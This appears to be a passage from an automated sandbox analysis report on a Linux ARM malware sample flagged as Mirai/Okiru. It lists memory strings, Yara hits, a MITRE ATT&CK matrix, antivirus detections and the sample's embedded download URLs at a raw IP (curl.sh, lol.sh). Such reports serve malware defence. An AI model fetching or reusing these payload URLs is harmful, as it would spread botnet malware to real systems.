Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-microblaze
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/sort1/usr/bin/rtstat/arm/sr10!/usr/bin/bash0!/usr/bin/x11perf1/usr/bin/update-mime-database0!/usr/bin/py3clean!/usr/bin/vmhgfs-fuse1/usr/bin/enchant-lsmod-2
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-cris
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc64
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/10!/usr/bin/ri2.701/usr/bin/vmware-namespace-cmd`!/usr/bin/caspol1/usr/bin/pkmon/arm/10!/usr/bin/pbget0!/usr/bin/info1/usr/bin/transmission-gtk
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-mipselQp
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U!/run/dbusbinfmt/arm/tmp1/var/run/sshd.pidrm/un/dbus0!/run/cupsKIF8evice-APW1/run/dmeventd-clientrun/cups0!/run/avahi-daemon!/var/run/udisks2arm/run1/usr/bin/xfce4-find-cursor0!/run/acpid.socket!/var/run/crond.pidm/run1/usr/bin/gtk-query-settings0!/run/vmware1/usr/bin/whoopsie-preferencese0!/run/utmp1/run/initctlU/arm/run/utmp0!/run/user1/var/run/mono-xsp4.pidn/mount0!/run/sudo1/run/mount
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/qemu-mipsn32
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsn32
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc64le
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-toolbox-cmd
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-hppa
Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.nn-20241218-0633.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.nn-20241218-0633.elf
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /var/run/vmware
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/fonttosfnt1/usr/bin/x86_64-linux-gnu-readelf1/usr/bin/cccheckarm/sr10!/usr/bin/gawk0!/usr/bin/uncompress1/usr/bin/glxheadsrm/sr10!/usr/bin/scsi_ready!/usr/bin/qemu-mips641/usr/bin/sqlmetalrm/10!/usr/bin/vim0!/usr/bin/enchant-21/usr/bin/networkd-dispatcher
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-xferlogs
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips64
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/qemu-nios2Q
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/oclock0!/usr/bin/uuidgen1/usr/bin/qemu-sparc64sr10!/usr/bin/pic0!/usr/bin/znew1/usr/bin/bzexe/arm/sr10!/usr/bin/strip0!/usr/bin/lspgpot1/usr/bin/update-manager10!/usr/bin/rview0!/usr/bin/more1/usr/bin/keep-one-running
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-nios2
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-mipsel
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-alpha
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/dev/cdrom0 /dev/vmci1
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/qemu-hppa!/usr/bin/zjsdecode1/usr/bin/sg_test_rwbufr10!/usr/bin/xmodmap!/usr/bin/comm1/usr/bin/bzip2/arm/sr10!/usr/bin/pdftocairo!/usr/bin/mv1/usr/bin/sg_sat_identifybin/mv!/usr/bin/arecord1/usr/bin/vmstat/arm/sr10!/usr/bin/locale-check!/usr/bin/ilasm!/usr/bin/appstreamclisr!/usr/bin/isovfy/arm/usr!/usr/bin/unzipsfxrm/A
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-checkvm
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp, arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10!/usr/bin/qemu-arm!/usr/bin/arch
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/peekfd0!/usr/bin/grog1/usr/bin/qemu-microblaze0!/usr/bin/sbverify!/usr/bin/getcifsacl!/usr/bin/wsdl/arm/usr1/usr/bin/debconfarm/10!/usr/bin/aa-exec1/usr/bin/xfce4-appfinder`!/usr/bin/foo2zjs-pstops1/usr/bin/zegrep/arm/sr10!/usr/bin/atrm0!/usr/bin/gprof1
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/dirmngr!/usr/bin/rlogin1/usr/bin/isodumparm/sr10!/usr/bin/qemu-mips!/usr/bin/lsusb1/usr/bin/laptop-detectr10!/usr/bin/xbiff0!/usr/bin/lzless1/usr/bin/al2U/arm/10!/usr/bin/ntfs-3g.probe!/usr/bin/xzdiff1/usr/bin/foo2hbpl2-wrapper
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/vmwarectrl
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-vgauth-smoketest
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/captoinfo!/usr/bin/sg_luns1/usr/bin/zenity/arm/sr10!/usr/bin/vmware-rpctool1/usr/bin/xfce4-display-settings1/usr/bin/xvidtunerm/sr10!/usr/bin/dbus-send!/usr/bin/hp-testpage1/usr/bin/nm
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/rygel0!/usr/bin/cli-al1/usr/bin/lz4U/arm/sr10!/usr/bin/hp-check1/usr/bin/qemu-aarch64_be1/usr/bin/gjsU/arm/sr10!/usr/bin/vdir0!/usr/bin/7zr1/usr/bin/pastebinit/usr/bin/ps0!/usr/bin/hcitool!/usr/bin/cloud-init1/usr/bin/du
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-alphaQ ;
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc64abi32
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-crisQP
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr/bin/pr0 /usr/bin/dconf0!/usr/bin/qemu-m68k1/usr/bin/certmgrarm/10!/usr/bin/lxterm01/usr/bin/md5sum.textutils1/usr/bin/kerneloops-submit
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-vgauth-cmd
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/ping60!/usr/bin/journalctl1/usr/bin/clear/arm/sr10!/usr/bin/qemu-s390x!/usr/bin/xbuild1/usr/bin/screendump/sr10!/usr/bin/dbus-monitor!/usr/bin/sg_verify1/usr/bin/sg_copy_results0!/usr/bin/parecord!/usr/bin/pdfimages1/usr/bin/byobu-select-session0!/usr/bin/pinky0!/usr/bin/sensors1/usr/bin/lua5.3/arm/10!/usr/bin/pygettext3!/usr/bin/rnano1/usr/bin/gnome-shell-extension-tool
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/zdump1/usr/bin/ps2pdfwrrm/sr10!/usr/bin/qemu-i386!/usr/bin/mutter1`
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-nios2
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-vmblock-fuse
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-x86_64
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/pidgin0!/usr/bin/bitmap1/usr/bin/qemu-ppc64abi32
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-mipsn32
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-riscv64
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-armeb
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-rpctool
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /tmp/vmware-root_721-4290559889
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/fwupdtpmevlog!/usr/bin/hp-probe1/usr/bin/helpztagsm/sr10!/usr/bin/chgrp0!/usr/bin/apt-get1/usr/bin/gzip/arm/sr10!/usr/bin/xzmore0!/usr/bin/gucharmap1/usr/bin/jsonpatch-jsondiff0!/usr/bin/xrefresh!/usr/bin/xlsfonts1/usr/bin/qemu-sparc/sr10!/usr/bin/alsatplg!/usr/bin/python!/usr/bin/prezip/arm/usr!/usr/bin/pycleanarm/usr!/usr/bin/xkbwatchrm/A
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/dev/vmci0 /dev/zfs1A
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /run/vmware
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/qemu-alpha!E
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10!/usr/bin/qemu-aarch64!/usr/bin/dirname
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmhgfs-fuse
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/trial30!/usr/bin/run-parts1/usr/bin/hipercdecodesr10!/usr/bin/strace0!/usr/bin/cli-csc1/usr/bin/hciconfigm/sr10!/usr/bin/fc-pattern!/usr/bin/sg_rep_zones1/usr/bin/zmore/arm/10!/usr/bin/fprintd-delete!/usr/bin/showrgb1/usr/bin/qemu-sparc32plus
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/proc/1629/exe0!/proc/896/exe1/tmp/vmware-root_721-42905598890!/usr/libexec/gsd-color!/proc/904/exe1/proc/2097/exe/arm/ro10!/proc/1627/exe0!/usr/bin/whoopsie1/proc/2208/exe/arm/sr10!/usr/libexec/gsd-wacom!/proc/910/exe1/usr/bin/nm-appletm/10!/proc/1623/exe0!/proc/912/exe1/usr/libexec/ibus-engine-simple
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/qemu-sh4!/usr/bin/lnstat1/usr/bin/ippfindarm/sr10!/usr/bin/pstree0!/usr/bin/xz1/usr/bin/x86_64-linux-gnu-size!/usr/bin/sudoreplay1/usr/bin/rsync/arm/sr10!/usr/bin/fprintd-verify!/usr/bin/isoinfo1/usr/bin/cpp-9/arm/sr10!/usr/bin/pftp0!/usr/bin/lpr1/usr/bin/x-www-browser10!/usr/bin/ppdmerge!/usr/bin/lzgrep1/usr/bin/cloud-idrm/sr10!/usr/bin/im-launch!/usr/bin/al1/usr/bin/xfce4-panel-profilesl1/usr/bin/loweb/arm/sr10!/usr/bin/gold0!/usr/bin/ruby2.71/usr/bin/xfce4-terminal10!/usr/bin/groff0!/usr/bin/uxterm1/usr/bin/apt-add-repository0!/usr/bin/unsquashfs!/usr/bin/atq1/usr/bin/lowntfs-3g/sr10!/usr/bin/expiry0!/usr/bin/hp-colorcal1
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /dev/vmci
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/qemu-mipsn32el
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmwarectrlQ
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/qemu-cris
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-mipsn32Q
Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.Lb1GCE
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr/bin/lp0 /usr/bin/perlthanks!/usr/bin/gnome-software1/usr/bin/sfill/arm/sr10!/usr/bin/getopt0!/usr/bin/lsmod1/usr/bin/xkbvledsrm/sr10!/usr/bin/gresource!/usr/bin/apt-config1/usr/bin/byobu-launcher-install0!/usr/bin/bashbug!/usr/bin/qemu-xtensa1/usr/bin/unity-settings-daemon0!/usr/bin/sgp_dd0!/usr/bin/pedump1/usr/bin/xfce4-mime-settings0!/usr/bin/rvim0!/usr/bin/pkexec!/usr/bin/zipcloakrm/usr1/usr/bin/git-upload-pack
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-i386
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-or1k
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmwarectrl
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U1/usr/bin/foo2zjs-wrapper0!/usr/bin/preconv!/usr/bin/qemu-x86_64U1/usr/bin/mcsU/arm/sr10!/usr/bin/jsonschema!/usr/bin/ypdomainname1/usr/bin/debconf-show10!/usr/bin/atril0!/usr/bin/dpkg-split
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/bccmd01/usr/bin/vmware-toolbox-cmd`!/usr/bin/lavadecode1/usr/bin/purple-url-handler0!/usr/bin/padsp0!/usr/bin/rmid1/usr/bin/gnome-session-inhibit0!/usr/bin/btrfs-image!/usr/bin/git1/usr/bin/software-properties-gtk!/usr/bin/sg_read_buffer!/usr/bin/apturl1/usr/bin/unattended-upgrade
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-namespace-cmd
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: 1/usr/bin/qemu-microblazeelz
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/usr/bin/lwp-mirror!/var/run/acpid.socket1/usr/bin/apport-unpackr10!/usr/bin/xmore0!/var/run/vmware1/usr/bin/dh_perl_openssl0!/usr/bin/fmt0!/var/run/utmp1/usr/bin/btattachrm/ar10!/usr/bin/lastlog!/var/run/user1/usr/bin/xfce4-settings-editor0!/usr/bin/printf0!/var/run/sudo1/usr/bin/lz4cat/arm/ar10!/usr/bin/lcf0!/var/run/spice-vdagentd!/usr/bin/chrt/arm/var1/usr/bin/iconv/arm/usr/bin/ul0!/usr/bin/tbl01/usr/bin/debconf-set-selections`!/var/run/screen!/usr/bin/erb2.7/arm/var1/usr/bin/xfce4-session-settings
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-sh4eb
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc64
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/zforce0!/usr/bin/dm-tool1/usr/bin/gsdj/arm/sr10!/usr/bin/ps2ps0!/usr/bin/python31/usr/bin/systemd-runsr10!/usr/bin/pa-info!/usr/bin/xeyes1/usr/bin/nroff/arm/sr10!/usr/bin/ristretto!/usr/bin/pdftohtml1/usr/bin/gst-inspect-1.00!/usr/bin/qemu-ppc64le!/usr/bin/trust1/usr/bin/unicode_stop10!/usr/bin/tty0!/usr/bin/paste1/usr/bin/desktop-file-edit
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-xtensaeb
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-cris
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: !/proc/379/exe!/usr/bin/vmtoolsdrm/pro1/usr/bin/foo2ddst-wrapper0!/proc/419/exe!/proc/721/exe/arm/pro1/usr/bin/session-migration0!/proc/420/exe1/proc/2078/exe/arm/ro10!/proc/1872/exe0!/proc/491/exe
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-xtensa
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-mipsn32elQ
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/qemu-mipsn32el
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/dev/vmci
Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.Lb1GCE
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10!/usr/bin/xfrun40!/usr/bin/ciptool1/usr/bin/linkiccarm/usr/bin/hd0!/usr/bin/c_rehash!/usr/bin/qemu-tilegx1/usr/bin/gnome-keyring-daemon
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /arm/usr/bin/vmwarectrl
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: 1/usr/bin/vmware-vgauth-smoketest
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/debconf-escape!/usr/bin/gsbj1/usr/bin/growpartrm/sr10!/usr/bin/gdb-add-index!/usr/bin/setarch1/usr/bin/ubuntu-bug/sr10!/usr/bin/qemu-armeb!/usr/bin/libreoffice1/usr/bin/pidof/arm/10!/usr/bin/podselect!/usr/bin/lzegrep1/usr/bin/x86_64-linux-gnu-elfedit
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-tilegx
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/usr/bin/qemu-mipselz
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: U/arm/sr10 /usr/bin/pdftoppm!/usr/bin/ssh-argv01/usr/bin/timedatectlsr10!/usr/bin/rrsync0!/usr/bin/lspci1/usr/bin/upower/arm/sr10!/usr/bin/gpu-manager!/usr/bin/unpack2001/usr/bin/unity-scope-loader0!/usr/bin/size0!/usr/bin/qemu-riscv641/usr/bin/shares-admin10!/usr/bin/run-this-one!/usr/bin/diff31/usr/bin/gnome-shell-perf-tool
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-aarch64_be
Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsn32el

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: arm5.nn-20241218-0633.elf, type: SAMPLE
Source: Yara match	File source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: arm5.nn-20241218-0633.elf, type: SAMPLE
Source: Yara match	File source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm5.nn-20241218-0633.elf PID: 6208, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: arm5.nn-20241218-0633.elf, type: SAMPLE
Source: Yara match	File source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: arm5.nn-20241218-0633.elf, type: SAMPLE
Source: Yara match	File source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm5.nn-20241218-0633.elf PID: 6208, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	11 File Deletion	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm5.nn-20241218-0633.elf	37%	Virustotal		Browse
arm5.nn-20241218-0633.elf	47%	ReversingLabs	Linux.Backdoor.Mirai
arm5.nn-20241218-0633.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://94.156.227.233/curl.sh	arm5.nn-20241218-0633.elf	false	high
http://94.156.227.233/lol.sh	arm5.nn-20241218-0633.elf	false	high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	arm5.nn-20241218-0633.elf	false	high
http://94.156.227.233/	arm5.nn-20241218-0633.elf	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
